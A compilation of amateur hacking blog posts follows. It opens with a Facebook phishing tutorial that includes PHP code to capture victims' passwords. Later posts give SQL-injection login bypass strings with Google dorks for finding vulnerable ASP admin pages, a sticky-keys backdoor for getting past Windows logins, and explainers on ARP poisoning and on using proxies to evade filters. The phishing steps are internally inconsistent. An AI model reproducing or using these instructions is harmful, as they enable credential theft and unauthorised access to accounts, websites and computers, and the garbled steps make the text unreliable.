MAKING FACEBOOK PHISHING SITE TUTORIAL.

The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.


header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


NOW save this as hello.php

Step7 : now make a account on t35.com and Upload

Login.html
hello.php
lol.txt

For A DETAILED way of uploading the Phishing site Visit: http://geekyshailabh.blogspot.in/2013/01/making-facebook-phishing-site-tutorial.html

NOTE: You ahve to make the other person enter his password and you can get the password by downloading the lol.txt file from your t35.com account by cPanel.

TURBO C++ compatible with Windows 7, 8 and Vista

Run Full screen Turbo C in Windows 7,8 & Vista 32 and 64 bits

Run Full screen Turbo C in Windows 7,8 & Vista 32 and 64 bits

Step:1

Download the software Setup_TurboC_7  [Click Here]

Step:2

Double click on the file "Setup_TurboC_7_v2.1.rar" which you downloaded,
open with winrar [or extract it] and install "Setup_TurboC_7_v2.1.exe".

now you can run Turbo C in full screen any time

just click on desktop icon "TurboC 7".
If you like this click Like button (on top left side of page).

Comparison between other methods of "Run Full screen Turbo C in Windows 7"

Other method i.e. available on net are based on DosBox and this software is also based on DosBox 0.74 [Thanks to the makers of DosBox] but this software have some advantage---

-Automatic (no need to read and apply complicated tutorial to run C in full screen) 

-no need to write commands on DosBox every time
-solved problem of "DosBox window close" when compile C programs with "ctrl+f9"

-solved resolution problem in PC 

-solved the problem of DosBox hangs on full screen in some PC

-no black screen problem in Starter & Home Basic version of windows

Website Hijacking – Complete Tutorial Part-1

Feb 17

Posted by shailabh

Hello viewers!
I would make sure that all the viewers are comfortable and enjoying the posts
Okay now lets begin with the topic I have mentioned above.
What is the first thing that comes to your mind when you see a topic like Website Hijacking ?? Do you feel like today after reading this you gonna hijack somebody’s website and bring the hell out of him?
lolz.. Well you can do that unless you are good at heart just to use this material for educational and awareness purpose and the most important thing is to safeguard your own website or your related website that may be your family business or someone close enough needs to be secured.
Alright as some of you may think why am I teaching you this and why is the topic name hijack if I recommend you to secure and not steal. Then let me tell you that the best way to secure yourself is to hack it yourself. You can provide yourself the best security only when you are good enough a thief
Well so here I begin with a motto to teach you guys how to secure yourselves.
Shall I ??
Okay! Here I go…
Every website that you visit or every website that is completely well available in the net obviously has somebody controlling it. I guess you call the guy ADMIN ?
Alright so does the admin sit there at the other end and wait for you to enter login ID and password and then check it out with his collection and allows or denies permission to access ?
Is it the case ?
Obviously “NO” would be the reply, the admin has a control panel as in case of your PC you have a control panel where you have designed and predefined things to manage your system. The same goes here the control panel is the mother of any website where the admin acts as a very good obedient kid. The control gives a database to the admin to store all the ID’s and passwords and when you try logging in you enter the ID and password which is then approved by the website database storing the ID’s and passwords.
Hence we all know that human are more intelligent than machine as we created machine so we can cheat the machine, that is we bypass the database procedure in some cases and in some cases we cheat the machine and upload our shells or deface the website or in some cases the worst is we poke and poke and poke the database using database management system technique and steal all the information from the database and gain access to the website. Have you guys not seen movies where one guy gets the other guy drunk and flatter him and acquire the required info ? That is the same in this case 3 too. We name this cases like the first case is called kidding where you bypass the asp governed sites, the second is XSS (cross site scripting method) and 3rd is the SQLi (my sequel commands injection).
Now how many of you are aware of binary coding ?
Well I am here for the one’s who haven’t yet.
Binary coding is in terms of 0′s and 1′s for every single thing we type as this is only what the system understands actually. even for ON ad OFF its o for OFF and 1 for ON.
in case of TRUE-FALSE o for FALSE and 1 represents TRUE.
so we’ll move direct to the first hijacking method that is KIDDING or call it KIDDO method:
usually the admins are a bit more intelligent as they have been gifted with few extra pounds of brain by their mother, so they use their login page as followed by domain name:
/ADMIN
/admin
/Admin
/Administrator
/administrator
/ADMINISTRATOR.
Now whats the password how do we find that out? In fact who cares and why should we waste our limited pounds brain finding the password for an asp governed website when we can simply bypass the database.
Lets see how…
There are few gates that you must know before you attempt the bypass method:
AND gate and OR gate, as the name suggest AND similar to ADD (so this gate multiplies any two input and returns the output)
where as the OR gate adds the inputs and returns the output value correspondingly.
““““““““““““““““““““““““““““““““““`
Okay now understand these tables:                                                                                    `
                                     
““““““““““““““““““““““““““““““““““`
Now we bypass the password using these tables making the database to read this conditions instead of typing the password and then the machine converts it to binary and then checks it out, we simply give it the binary codes directly and make the machine check the condition and give us access!
Remember this bypass is for asp governed site only so lets take an asp governed site and show it to you:
Go to Google and search for  asp login site and type the username/user ID as types I have mentioned above and in place of password try bypassing it using this method.
0 ‘or’ 0 ‘=’ 0 and hit enter you are either logged in or denied, if denied then try
1 ‘or’ 1 ‘=’ 1 and enter
Enjoy this, you have the entire tables above
Then XSS and SQLi are too big to be posted in this post so it will be posted in my next post following thing… Hope you enjoy by then
http://www.webstatschecker.com/stats/keyword/adminlogin_asp_pk
Here are some dorks that will avail you this kinda vulnerable websites. Copy and paste them in Google search!
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
cheers!!

The Real Hacker Skills

Feb 13

Posted by Shailabh

Hey buddies, I’m back again! Well, coming to the topic today I am going to discuss about the real hacking skills. If you want to make your career in hacking then you must have these skills and you must read this article because this is gonna really help you out very much.
As you all know who a hacker is, yes a computer geek! So what a computer geek must know is everything about a computer. What I mean by everything is,  in and out of a computer, that is every single bit of a system. You must have the complete software knowledge and a little of hardware is enough. You must understand how the hardware stuff works, the hardisk, the RAM and the most important the mother board!
So now coming to software, you need to have a very good programming skills… Because you can break it only when you can make it! You need to know all the scripting languages, most of them.
Below are few programming and scripting languages which a hacker must have a sound knowledge on!
1. C++ programming
2. JavaScript
3. Python programming
4. MySQL
5. PHP
6. Perl and Pascal
7. Assembly language
8. Basics of HTML, CSS, ASP  and Java
Now suppose, you know all of the stuff which I have mentioned above, you thing you are a hacker now…? No, not at all you just are a programmer not a hacker yet. What I mean is you just learn to make it not to break yet!
So what’s your next step? Its to go ahead and experiment on these stuff, remember to be creative everytime you start experimenting!

Firewall – How it works?

Feb 5

Posted by Shailabh

Hey… Here today I came up with an article on Firewalls. I will speak about how it works and how are they useful for cyber security purpose. Well if you are a regular internet user then you might have heard of the word ‘firewall’ long time before. Well, I will explain it to you with a simple example, when an employee in his office tries to access a website such as social network they get a message “Firewall used” on their screen! This is what the function of a firewall. A firewall protects the entire corporate network so that hackers cannot enter into your private (corporate) network.
You might be wondering what a hacker must do knowing about firewalls! The answer is, a potential hacker can break into firewalls accessing the corporate network and ends up stealing Metadata or violating the network! Hackers bypass into firewalls using various techniques but today I will just give you a simple idea on firewalls.
Basically, a firewall is a potential barrier used to keep the hackers (and other violating scripts) away from the internal corporate network! A firewall is a piece of software which filters the packets of information received to your private network.

How it works?Suppose, you own a corporate network where you got few people working in you network. If you don’t protect your network with a firewall then the users on your network can access anything on internet and would leave their footprints as a result a potential hacker can exploit your network and steal your credentials. Mean to say, all those computers are directly accessible to anyone on the internet and a hacker who knows what the person is doing can probe those computers, try to make FTP connections to them, try to make telnet connections to them and so on. If one employee makes a mistake and leaves a link to the internal network, hacker can get to the computer and exploit the network. But if you use a firewall, your network is safe. A firewall will function with the help of a set of instructions which will prevent hackers access your network. If you setup instructions such as prevent all the users on this network using FTP or access a particular website or web server then you can control the people on your network connect to Web sites, sending files over the network etc.
Firewalls examine the source IP address of packets to determine if they are legitimate to the network. A firewall may be instructed to allow the access of person if it comes from a specific trusted host. A malicious hacker would then try to gain entry by “spoofing” the source IP address of packets sent to the firewall. If the firewall detects that, the packets originated from a trusted host, it may let them through.
A hacker can use a proxy to enter in to the corporate network as a legitimate. The cracker must need to know a good deal about the firewall’s rule base to exploit this kind of weakness.
Share your doubts and comments below!

Planting Backdoors in Windows OS – Bypass Login Password

Feb-9

Posted by Shailabh

Backdoor in Windows

Hey guys, Today I am going to tell you about planting backdoors on windows operating system. Well, first I will mention what a backdoor is. A backdoor is a path through which an access made with out the authority’s permission or his knowledge. So today after reading this article you could plant a backdoor on a windows system, but you need a complete access once into his system for that. Once you access the victim’s system you will have to follow the below steps.
Finding Sticky Key
Press five times Shift key and see what happens! This works on both Windows XP and Windows 7
Here, a message pops up and asks you whether to turn ON StickyKeys or NO. Click YES and let the program RUN.
Finding Location of StickyKey Program
It’s very simple to find the location of a running program as you all know! Well, most of you don’t know it. I will tell you how.
Open Task Manager (Ctrl+Shift+Esc) and right click on the program which is running.
Note: Close all the programs before you start planting backdoors, otherwise you will confuse locating which program belongs to StickyKey program in Task Manager.
After you get the running program in Task Manager, right click on the program and Open the directory containing the file. The program would been named as sethc.exe

You can skip this step and directly go to the next step but I am mentioning this so that this will be helpful for you in future to find the file location of the running program!

Changing the location of the file and replacing the executable file
Go to the directory containing the file, i.e., C:/Windows/System32/
Now move the file sethc.exe from that folder to some other folder. And now locate the file cmd.exe in the same folder, i.e., C:/Windows/System32/
So now rename the file cmd.exe to sethc.exe
Note: In Windows 7 you will have to change the permissions to Full Control to change the file location. Or else you will have to use Administrator account.
Now time for the action!
Restart your computer and wait till login screen is displayed. Now you don’t have to type password and access the file but rather you can do it by just pressing Shift key 5 times. That is, when you press shift key 5 time you will get command prompt. As you all know that any changes could be done by using command prompt.
Here are few command which will help you performing necessary actions:
net user username new_password
This will allow you to change the password of the system. Just type username of the windows guest/Admin account and new password that you want to set then hit Enter.
C:/…
Just replace ‘…’ by the file location you want to reach and this will give you the complete access to those files
ping IP_address
This command will connect to the system whose IP address is provided

So that’s it for today… In my next article I will describe how to secure this backdoor.

Introduction to ARP – Poisoning

Feb 4

Posted by Shailabh

ARP stands for Address Resolution Protocol. ARP acts as a layer over the Internet Protocol address (IP) and converts it into a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA). Understanding the concept of ARP is very important for a hacker because, a potential hacker will be able to poison the network and steal the information running between two servers. Hence he can execute a ‘Man-In-The-Middle‘ attack using a simple ARP poisoning tool such as Cain & Abel. The function of Cain & Abel is similar to a packet sniffer.
MAC address is a unique identification address for network nodes, such as computers, printers, and other devices on a LAN.  MAC addresses are associated to network adapter that connects devices to networks.  The MAC address is critical to locating networked hardware devices because it ensures that data packets go to the correct place.  ARP tables, or cache, are used to correlate network device’s IP addresses to their MAC addresses.
How it works?
Consider you want the phone number of a person whose name is already known to you. In that case you will checkout your telephone book and if the number is not available the you will call the phone service and request him the number. Here the telephone directory act as ARP tables and the phone service as ARP. ARP tables give the list of addresses of computers which are connected to that system inside the network.
What is ARP poisoning?
If a system(say System 1) requests to connect to another system(System 2) inside the network, then System 2 checks the entry of the System 1 in its ARP tables and if the entry is not present then it is automatically added in System 2′s ARP tables. The weakness of the ARP is that, it cannot identify if a person request to connect with it showing a another address. Therefore a hacker can easily poison this network, that is, a potential hacker if sends a request to connect to System 2 showing the IP address of System 1 then he can access the network of System 1 associated with System 2! So he will be able to obtain the information passing between them. That is, there is another path executed between the System 1 and System 2.
Suppose, if a hacker has poisoned a path between social networking site and a victim’s system then he would be able to steal the information passing between them, like username and password etc.
So here, in this case the phone service is calling you and giving you the number, even though you haven’t requested it! (Scenario mentioned above)
The concept of ARP with a simple example:
The attacker: 10.0.0.1
MAC address: 00-AA-BB-CC-DD-00
The victims: 10.0.0.2
MAC address: 00-AA-BB-CC-DD-E1
Fake address:10.0.0.3
MAC address: 00-AA-BB-CC-DD-E2
A potential hacker sends a packet (request to connect) to 10.0.0.2 with spoofed IP of  10.0.0.3 and then it sends a crafted package to 10.0.0.3 with  spoofed IP of 10.0.0.2 with his own IP. This means that both victims think they can find each other at the MAC address of the attacker. This is known as Man-In-The-Middle attack
Now all the traffic between those 2 hosts will go through the attacker first. So this means that the attack will need to reroute the packets to the real destination else you get a DOS on the network and there will be no traffic possible. Also remember that the ARP tables get updated so if during a long period of time there is no ARP poisoning the entries will be deleted and you won’t be able to sniff until you start poisoning again.


In my upcoming posts I will be talking about using Cain & Abel to poison a network so stay updated!

Introduction to Proxy sites

Feb 4

Posted by Shailabh

Basic idea about how proxy works!

Hey guys, today I will share about Proxy sites, what it is and its uses. Proxy acts as the intermediate between the hacker’s system and web server. In common proxy is an application or computer system which covers your IP address to seek the information from the web server. An attacker (attacker) connects to the proxy server, requesting some service, such as a web page, or other resource available from a different server. The proxy server evaluates the request according to its filtering rules. It may filter by IP address or by a protocol. That is, it will change your IP address or it will convert your request into a protocol allowing you to access the content of that sever. Here is the scenario of one of my uncle who works in a pharma company as a manager where he has a free access to internet but he is not allowed to have access with  social networking sites! He told me that the sites like Facebook, MySpace and LinkedIn are not allowed to access so I came up with this…! I asked him to log into any proxy site and enter into Facebook or any other site by typing the url in the proxy site. This encodes the url and the page, not allowing the server to identify your computer. Your computer IP would have been changed when we use proxy. This was just a scenario of  an employ but an attacker can use this for many purposes. He can enter into a corporate firewalls just by imitating the IP address own the victim who is already inside the firewall network. That is, a hacker if wants to hack a web service then he will connect with a PC which is already in connect with the web service! A proxy server may optionally alter the attacker’s request or the server’s response, and sometimes it may serve the request without contacting the specified server. In this case, it ‘caches’ responses from the remote server, and returns subsequent requests for the same content directly. I wanted to hack into my college’s website so if I had to do so then I had to connect to my principal’s computer which is already a part of the network since principal has a to gain access into the college website’s account and use his computer’s IP as proxy and enter to the website’s login page. Uses:

• It can be used to be an anonymous user, keeping your self hidden.
• Web proxies are commonly used to cache web pages from a web server.
• To have an access to networking sites or content, e.g. to block undesired sites.
• To access sites prohibited sites by your Internet Service Provider.
• To provide company employee Internet usage reporting.
• To bypass security / parental controls of a PC.
• To avoid Internet filtering to access content, e.g. to access social networking sites in colleges and schools.
• To scan transmitted content for malware before delivery.
• To hack into any computer.
• To allow a web site to make web requests to externally hosted resources when cross-domain restrictions prohibit the web site from linking directly to the outside domains.
• To speed up access to resources (using caching).

This gave you a basic notion about the proxy sites and proxy sever. In my upcoming posts i will talk about making a proxy site and hacking in an internal server using proxy! Please comment and share if you find this post helpful…